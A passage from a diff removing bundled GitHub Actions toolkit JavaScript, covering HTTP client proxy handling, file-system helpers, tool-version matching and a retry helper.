- } - if (data && typeof data !== 'string') { - data.on('close', function () { - req.end(); - }); - data.pipe(req); - } - else { - req.end(); - } - } - /** - * Gets an http agent. This function is useful when you need an http agent that handles - * routing through a proxy server - depending upon the url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com - */ - getAgent(serverUrl) { - const parsedUrl = new URL(serverUrl); - return this._getAgent(parsedUrl); - } - getAgentDispatcher(serverUrl) { - const parsedUrl = new URL(serverUrl); - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if (!useProxy) { - return; - } - return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); - } - _prepareRequest(method, requestUrl, headers) { - const info = {}; - info.parsedUrl = requestUrl; - const usingSsl = info.parsedUrl.protocol === 'https:'; - info.httpModule = usingSsl ? https : http; - const defaultPort = usingSsl ? 443 : 80; - info.options = {}; - info.options.host = info.parsedUrl.hostname; - info.options.port = info.parsedUrl.port - ? parseInt(info.parsedUrl.port) - : defaultPort; - info.options.path = - (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); - info.options.method = method; - info.options.headers = this._mergeHeaders(headers); - if (this.userAgent != null) { - info.options.headers['user-agent'] = this.userAgent; - } - info.options.agent = this._getAgent(info.parsedUrl); - // gives handlers an opportunity to participate - if (this.handlers) { - for (const handler of this.handlers) { - handler.prepareRequest(info.options); - } - } - return info; - } - _mergeHeaders(headers) { - if (this.requestOptions && this.requestOptions.headers) { - return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); - } - return lowercaseKeys(headers || {}); - } - _getExistingOrDefaultHeader(additionalHeaders, header, _default) { - let clientHeader; - if (this.requestOptions && this.requestOptions.headers) { - clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; - } - return additionalHeaders[header] || clientHeader || _default; - } - _getAgent(parsedUrl) { - let agent; - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if (this._keepAlive && useProxy) { - agent = this._proxyAgent; - } - if (this._keepAlive && !useProxy) { - agent = this._agent; - } - // if agent is already assigned use that agent. - if (agent) { - return agent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - let maxSockets = 100; - if (this.requestOptions) { - maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; - } - // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. - if (proxyUrl && proxyUrl.hostname) { - const agentOptions = { - maxSockets, - keepAlive: this._keepAlive, - proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { - proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` - })), { host: proxyUrl.hostname, port: proxyUrl.port }) - }; - let tunnelAgent; - const overHttps = proxyUrl.protocol === 'https:'; - if (usingSsl) { - tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; - } - else { - tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; - } - agent = tunnelAgent(agentOptions); - this._proxyAgent = agent; - } - // if reusing agent across request and tunneling agent isn't assigned create a new agent - if (this._keepAlive && !agent) { - const options = { keepAlive: this._keepAlive, maxSockets }; - agent = usingSsl ? new https.Agent(options) : new http.Agent(options); - this._agent = agent; - } - // if not using private agent and tunnel agent isn't setup then use global agent - if (!agent) { - agent = usingSsl ? https.globalAgent : http.globalAgent; - } - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - agent.options = Object.assign(agent.options || {}, { - rejectUnauthorized: false - }); - } - return agent; - } - _getProxyAgentDispatcher(parsedUrl, proxyUrl) { - let proxyAgent; - if (this._keepAlive) { - proxyAgent = this._proxyAgentDispatcher; - } - // if agent is already assigned use that agent. - if (proxyAgent) { - return proxyAgent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { - token: `${proxyUrl.username}:${proxyUrl.password}` - }))); - this._proxyAgentDispatcher = proxyAgent; - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { - rejectUnauthorized: false - }); - } - return proxyAgent; - } - _performExponentialBackoff(retryNumber) { - return __awaiter(this, void 0, void 0, function* () { - retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); - const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); - return new Promise(resolve => setTimeout(() => resolve(), ms)); - }); - } - _processResponse(res, options) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - const statusCode = res.message.statusCode || 0; - const response = { - statusCode, - result: null, - headers: {} - }; - // not found leads to null obj returned - if (statusCode === HttpCodes.NotFound) { - resolve(response); - } - // get the result from the body - function dateTimeDeserializer(key, value) { - if (typeof value === 'string') { - const a = new Date(value); - if (!isNaN(a.valueOf())) { - return a; - } - } - return value; - } - let obj; - let contents; - try { - contents = yield res.readBody(); - if (contents && contents.length > 0) { - if (options && options.deserializeDates) { - obj = JSON.parse(contents, dateTimeDeserializer); - } - else { - obj = JSON.parse(contents); - } - response.result = obj; - } - response.headers = res.message.headers; - } - catch (err) { - // Invalid resource (contents not json); leaving result obj null - } - // note that 3xx redirects are handled by the http layer. - if (statusCode > 299) { - let msg; - // if exception/error in body, attempt to get better error - if (obj && obj.message) { - msg = obj.message; - } - else if (contents && contents.length > 0) { - // it may be the case that the exception is in the body message as string - msg = contents; - } - else { - msg = `Failed request: (${statusCode})`; - } - const err = new HttpClientError(msg, statusCode); - err.result = response.result; - reject(err); - } - else { - resolve(response); - } - })); - }); - } -} -exports.HttpClient = HttpClient; -const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); -//# sourceMappingURL=index.js.map - -/***/ }), - -/***/ 9835: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.checkBypass = exports.getProxyUrl = void 0; -function getProxyUrl(reqUrl) { - const usingSsl = reqUrl.protocol === 'https:'; - if (checkBypass(reqUrl)) { - return undefined; - } - const proxyVar = (() => { - if (usingSsl) { - return process.env['https_proxy'] || process.env['HTTPS_PROXY']; - } - else { - return process.env['http_proxy'] || process.env['HTTP_PROXY']; - } - })(); - if (proxyVar) { - try { - return new URL(proxyVar); - } - catch (_a) { - if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) - return new URL(`http://${proxyVar}`); - } - } - else { - return undefined; - } -} -exports.getProxyUrl = getProxyUrl; -function checkBypass(reqUrl) { - if (!reqUrl.hostname) { - return false; - } - const reqHost = reqUrl.hostname; - if (isLoopbackAddress(reqHost)) { - return true; - } - const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; - if (!noProxy) { - return false; - } - // Determine the request port - let reqPort; - if (reqUrl.port) { - reqPort = Number(reqUrl.port); - } - else if (reqUrl.protocol === 'http:') { - reqPort = 80; - } - else if (reqUrl.protocol === 'https:') { - reqPort = 443; - } - // Format the request hostname and hostname with port - const upperReqHosts = [reqUrl.hostname.toUpperCase()]; - if (typeof reqPort === 'number') { - upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); - } - // Compare request host against noproxy - for (const upperNoProxyItem of noProxy - .split(',') - .map(x => x.trim().toUpperCase()) - .filter(x => x)) { - if (upperNoProxyItem === '*' || - upperReqHosts.some(x => x === upperNoProxyItem || - x.endsWith(`.${upperNoProxyItem}`) || - (upperNoProxyItem.startsWith('.') && - x.endsWith(`${upperNoProxyItem}`)))) { - return true; - } - } - return false; -} -exports.checkBypass = checkBypass; -function isLoopbackAddress(host) { - const hostLower = host.toLowerCase(); - return (hostLower === 'localhost' || - hostLower.startsWith('127.') || - hostLower.startsWith('[::1]') || - hostLower.startsWith('[0:0:0:0:0:0:0:1]')); -} -//# sourceMappingURL=proxy.js.map - -/***/ }), - -/***/ 1962: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var _a; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getCmdPath = exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -_a = fs.promises -// export const {open} = 'fs' -, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; -// export const {open} = 'fs' -exports.IS_WINDOWS = process.platform === 'win32'; -// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 -exports.UV_FS_O_EXLOCK = 0x10000000; -exports.READONLY = fs.constants.O_RDONLY; -function exists(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - try { - yield exports.stat(fsPath); - } - catch (err) { - if (err.code === 'ENOENT') { - return false; - } - throw err; - } - return true; - }); -} -exports.exists = exists; -function isDirectory(fsPath, useStat = false) { - return __awaiter(this, void 0, void 0, function* () { - const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); - return stats.isDirectory(); - }); -} -exports.isDirectory = isDirectory; -/** - * On OSX/Linux, true if path starts with '/'. On Windows, true for paths like: - * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). - */ -function isRooted(p) { - p = normalizeSeparators(p); - if (!p) { - throw new Error('isRooted() parameter "p" cannot be empty'); - } - if (exports.IS_WINDOWS) { - return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello - ); // e.g. C: or C:\hello - } - return p.startsWith('/'); -} -exports.isRooted = isRooted; -/** - * Best effort attempt to determine whether a file exists and is executable. - * @param filePath file path to check - * @param extensions additional file extensions to try - * @return if file exists and is executable, returns the file path. otherwise empty string. - */ -function tryGetExecutablePath(filePath, extensions) { - return __awaiter(this, void 0, void 0, function* () { - let stats = undefined; - try { - // test file exists - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // on Windows, test for valid extension - const upperExt = path.extname(filePath).toUpperCase(); - if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { - return filePath; - } - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - // try each extension - const originalFilePath = filePath; - for (const extension of extensions) { - filePath = originalFilePath + extension; - stats = undefined; - try { - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // preserve the case of the actual file (since an extension was appended) - try { - const directory = path.dirname(filePath); - const upperName = path.basename(filePath).toUpperCase(); - for (const actualName of yield exports.readdir(directory)) { - if (upperName === actualName.toUpperCase()) { - filePath = path.join(directory, actualName); - break; - } - } - } - catch (err) { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); - } - return filePath; - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - } - return ''; - }); -} -exports.tryGetExecutablePath = tryGetExecutablePath; -function normalizeSeparators(p) { - p = p || ''; - if (exports.IS_WINDOWS) { - // convert slashes on Windows - p = p.replace(/\//g, '\\'); - // remove redundant slashes - return p.replace(/\\\\+/g, '\\'); - } - // remove redundant slashes - return p.replace(/\/\/+/g, '/'); -} -// on Mac/Linux, test the execute bit -// R W X R W X R W X -// 256 128 64 32 16 8 4 2 1 -function isUnixExecutable(stats) { - return ((stats.mode & 1) > 0 || - ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || - ((stats.mode & 64) > 0 && stats.uid === process.getuid())); -} -// Get the path of cmd.exe in windows -function getCmdPath() { - var _a; - return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; -} -exports.getCmdPath = getCmdPath; -//# sourceMappingURL=io-util.js.map - -/***/ }), - -/***/ 7436: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; -const assert_1 = __nccwpck_require__(9491); -const path = __importStar(__nccwpck_require__(1017)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -/** - * Copies a file or folder. - * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js - * - * @param source source path - * @param dest destination path - * @param options optional. See CopyOptions. - */ -function cp(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - const { force, recursive, copySourceDirectory } = readCopyOptions(options); - const destStat = (yield ioUtil.exists(dest)) ? yield ioUtil.stat(dest) : null; - // Dest is an existing file, but not forcing - if (destStat && destStat.isFile() && !force) { - return; - } - // If dest is an existing directory, should copy inside. - const newDest = destStat && destStat.isDirectory() && copySourceDirectory - ? path.join(dest, path.basename(source)) - : dest; - if (!(yield ioUtil.exists(source))) { - throw new Error(`no such file or directory: ${source}`); - } - const sourceStat = yield ioUtil.stat(source); - if (sourceStat.isDirectory()) { - if (!recursive) { - throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); - } - else { - yield cpDirRecursive(source, newDest, 0, force); - } - } - else { - if (path.relative(source, newDest) === '') { - // a file cannot be copied to itself - throw new Error(`'${newDest}' and '${source}' are the same file`); - } - yield copyFile(source, newDest, force); - } - }); -} -exports.cp = cp; -/** - * Moves a path. - * - * @param source source path - * @param dest destination path - * @param options optional. See MoveOptions. - */ -function mv(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - if (yield ioUtil.exists(dest)) { - let destExists = true; - if (yield ioUtil.isDirectory(dest)) { - // If dest is directory copy src into dest - dest = path.join(dest, path.basename(source)); - destExists = yield ioUtil.exists(dest); - } - if (destExists) { - if (options.force == null || options.force) { - yield rmRF(dest); - } - else { - throw new Error('Destination already exists'); - } - } - } - yield mkdirP(path.dirname(dest)); - yield ioUtil.rename(source, dest); - }); -} -exports.mv = mv; -/** - * Remove a path recursively with force - * - * @param inputPath path to remove - */ -function rmRF(inputPath) { - return __awaiter(this, void 0, void 0, function* () { - if (ioUtil.IS_WINDOWS) { - // Check for invalid characters - // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file - if (/[*"<>|]/.test(inputPath)) { - throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); - } - } - try { - // note if path does not exist, error is silent - yield ioUtil.rm(inputPath, { - force: true, - maxRetries: 3, - recursive: true, - retryDelay: 300 - }); - } - catch (err) { - throw new Error(`File was unable to be removed ${err}`); - } - }); -} -exports.rmRF = rmRF; -/** - * Make a directory. Creates the full path with folders in between - * Will throw if it fails - * - * @param fsPath path to create - * @returns Promise - */ -function mkdirP(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(fsPath, 'a path argument must be provided'); - yield ioUtil.mkdir(fsPath, { recursive: true }); - }); -} -exports.mkdirP = mkdirP; -/** - * Returns path of a tool had the tool actually been invoked. Resolves via paths. - * If you check and the tool does not exist, it will throw. - * - * @param tool name of the tool - * @param check whether to check if tool exists - * @returns Promise path to tool - */ -function which(tool, check) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // recursive when check=true - if (check) { - const result = yield which(tool, false); - if (!result) { - if (ioUtil.IS_WINDOWS) { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); - } - else { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); - } - } - return result; - } - const matches = yield findInPath(tool); - if (matches && matches.length > 0) { - return matches[0]; - } - return ''; - }); -} -exports.which = which; -/** - * Returns a list of all occurrences of the given tool on the system path. - * - * @returns Promise the paths of the tool - */ -function findInPath(tool) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // build the list of extensions to try - const extensions = []; - if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { - for (const extension of process.env['PATHEXT'].split(path.delimiter)) { - if (extension) { - extensions.push(extension); - } - } - } - // if it's rooted, return it if exists. otherwise return empty. - if (ioUtil.isRooted(tool)) { - const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); - if (filePath) { - return [filePath]; - } - return []; - } - // if any path separators, return empty - if (tool.includes(path.sep)) { - return []; - } - // build the list of directories - // - // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, - // it feels like we should not do this. Checking the current directory seems like more of a use - // case of a shell, and the which() function exposed by the toolkit should strive for consistency - // across platforms. - const directories = []; - if (process.env.PATH) { - for (const p of process.env.PATH.split(path.delimiter)) { - if (p) { - directories.push(p); - } - } - } - // find all matches - const matches = []; - for (const directory of directories) { - const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); - if (filePath) { - matches.push(filePath); - } - } - return matches; - }); -} -exports.findInPath = findInPath; -function readCopyOptions(options) { - const force = options.force == null ? true : options.force; - const recursive = Boolean(options.recursive); - const copySourceDirectory = options.copySourceDirectory == null - ? true - : Boolean(options.copySourceDirectory); - return { force, recursive, copySourceDirectory }; -} -function cpDirRecursive(sourceDir, destDir, currentDepth, force) { - return __awaiter(this, void 0, void 0, function* () { - // Ensure there is not a run away recursive copy - if (currentDepth >= 255) - return; - currentDepth++; - yield mkdirP(destDir); - const files = yield ioUtil.readdir(sourceDir); - for (const fileName of files) { - const srcFile = `${sourceDir}/${fileName}`; - const destFile = `${destDir}/${fileName}`; - const srcFileStat = yield ioUtil.lstat(srcFile); - if (srcFileStat.isDirectory()) { - // Recurse - yield cpDirRecursive(srcFile, destFile, currentDepth, force); - } - else { - yield copyFile(srcFile, destFile, force); - } - } - // Change the mode for the newly created directory - yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); - }); -} -// Buffered file copy -function copyFile(srcFile, destFile, force) { - return __awaiter(this, void 0, void 0, function* () { - if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { - // unlink/re-link it - try { - yield ioUtil.lstat(destFile); - yield ioUtil.unlink(destFile); - } - catch (e) { - // Try to override file permission - if (e.code === 'EPERM') { - yield ioUtil.chmod(destFile, '0666'); - yield ioUtil.unlink(destFile); - } - // other errors = it doesn't exist, no work to do - } - // Copy over symlink - const symlinkFull = yield ioUtil.readlink(srcFile); - yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); - } - else if (!(yield ioUtil.exists(destFile)) || force) { - yield ioUtil.copyFile(srcFile, destFile); - } - }); -} -//# sourceMappingURL=io.js.map - -/***/ }), - -/***/ 2473: -/***/ (function(module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; -const semver = __importStar(__nccwpck_require__(5911)); -const core_1 = __nccwpck_require__(2186); -// needs to be require for core node modules to be mocked -/* eslint @typescript-eslint/no-require-imports: 0 */ -const os = __nccwpck_require__(2037); -const cp = __nccwpck_require__(2081); -const fs = __nccwpck_require__(7147); -function _findMatch(versionSpec, stable, candidates, archFilter) { - return __awaiter(this, void 0, void 0, function* () { - const platFilter = os.platform(); - let result; - let match; - let file; - for (const candidate of candidates) { - const version = candidate.version; - core_1.debug(`check ${version} satisfies ${versionSpec}`); - if (semver.satisfies(version, versionSpec) && - (!stable || candidate.stable === stable)) { - file = candidate.files.find(item => { - core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); - let chk = item.arch === archFilter && item.platform === platFilter; - if (chk && item.platform_version) { - const osVersion = module.exports._getOsVersion(); - if (osVersion === item.platform_version) { - chk = true; - } - else { - chk = semver.satisfies(osVersion, item.platform_version); - } - } - return chk; - }); - if (file) { - core_1.debug(`matched ${candidate.version}`); - match = candidate; - break; - } - } - } - if (match && file) { - // clone since we're mutating the file list to be only the file that matches - result = Object.assign({}, match); - result.files = [file]; - } - return result; - }); -} -exports._findMatch = _findMatch; -function _getOsVersion() { - // TODO: add windows and other linux, arm variants - // right now filtering on version is only an ubuntu and macos scenario for tools we build for hosted (python) - const plat = os.platform(); - let version = ''; - if (plat === 'darwin') { - version = cp.execSync('sw_vers -productVersion').toString(); - } - else if (plat === 'linux') { - // lsb_release process not in some containers, readfile - // Run cat /etc/lsb-release - // DISTRIB_ID=Ubuntu - // DISTRIB_RELEASE=18.04 - // DISTRIB_CODENAME=bionic - // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" - const lsbContents = module.exports._readLinuxVersionFile(); - if (lsbContents) { - const lines = lsbContents.split('\n'); - for (const line of lines) { - const parts = line.split('='); - if (parts.length === 2 && - (parts[0].trim() === 'VERSION_ID' || - parts[0].trim() === 'DISTRIB_RELEASE')) { - version = parts[1] - .trim() - .replace(/^"/, '') - .replace(/"$/, ''); - break; - } - } - } - } - return version; -} -exports._getOsVersion = _getOsVersion; -function _readLinuxVersionFile() { - const lsbReleaseFile = '/etc/lsb-release'; - const osReleaseFile = '/etc/os-release'; - let contents = ''; - if (fs.existsSync(lsbReleaseFile)) { - contents = fs.readFileSync(lsbReleaseFile).toString(); - } - else if (fs.existsSync(osReleaseFile)) { - contents = fs.readFileSync(osReleaseFile).toString(); - } - return contents; -} -exports._readLinuxVersionFile = _readLinuxVersionFile; -//# sourceMappingURL=manifest.js.map - -/***/ }), - -/***/ 8279: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.RetryHelper = void 0; -const core = __importStar(__nccwpck_require__(2186)); -/** - * Internal class for retries - */ -class RetryHelper { - constructor(maxAttempts, minSeconds, maxSeconds) { - if (maxAttempts < 1) { - throw new Error('max attempts should be greater than or equal to 1'); - } - this.maxAttempts = maxAttempts; - this.minSeconds = Math.floor(minSeconds); - this.maxSeconds = Math.floor(maxSeconds); - if (this.minSeconds > this.maxSeconds) { - throw new Error('min seconds should be less than or equal to max seconds'); - } - } - execute(action, isRetryable) { - return __awaiter(this, void 0, void 0, function* () { - let attempt = 1; - while (attempt < this.maxAttempts) { - // Try - try { - return yield action(); - } - catch (err) { - if (isRetryable && !isRetryable(err)) { - throw err; - } - core.info(err.message); - } - // Sleep - const seconds = this.getSleepAmount(); - core.info(`Waiting ${seconds} seconds before trying again`); - yield this.sleep(seconds); - attempt++; - } - // Last attempt - return yield action(); - }); - } - getSleepAmount() { - return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + - this.minSeconds); - } - sleep(seconds) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise(resolve => setTimeout(resolve, seconds * 1000)); - }); - } -} -exports.RetryHelper = RetryHelper; -//# sourceMappingURL=retry-helper.js.map - -/***/ }), - -/***/ 7784: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) 